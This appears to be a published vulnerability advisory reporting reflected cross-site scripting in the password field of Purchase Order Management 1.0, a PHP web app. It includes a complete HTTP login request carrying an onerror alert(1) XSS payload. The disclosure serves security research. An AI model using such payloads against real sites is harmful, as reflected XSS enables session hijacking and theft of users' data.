Purchase Order Management 1.0 Cross Site Scripting

Purchase Order Management version 1.0 appears to suffer from a cross site scripting vulnerability due to printing errors with a malicious password payload.


SHA-256 | f1221013e8f2beac1700049c1a812303b165d11bb1c7cdd1db59c605ed5b50fb

## Title: Purchase Order Management-1.0 - XSS-Reflected - Information-gathering
## Author: nu11secur1ty
## Date: 03.06.2023
## Vendor: https://www.sourcecodester.com/user/257130/activity
## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected

## Description:
The value of the `password` request parameter is copied into the HTML
document as plain text between tags. The payload uay4w<img src=a
onerror=alert(1)>s4m6g was submitted in the password parameter. This
input was echoed unmodified in the application's response.

STATUS: HIGH Vulnerability

[+]Exploit:
```POST
POST /purchase_order/classes/Login.php?f=login HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=83loqso6i0hee5lpfufibf68o5
Origin: http://localhost
X-Requested-With: XMLHttpRequest
Referer: http://localhost/purchase_order/admin/login.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="110", "Chromium";v="110"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 37

username=gAjjuMUL&password=k8Z!h2w!V7uay4w%3cimg%20src%3da%20onerror%3dalert(1)%3es4m6g
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0/XSS-Reflected)

## Proof and Exploit:
[href](https://streamable.com/cgw8a4)

## Time spend:
00:15:00


--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>


--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

Related Posts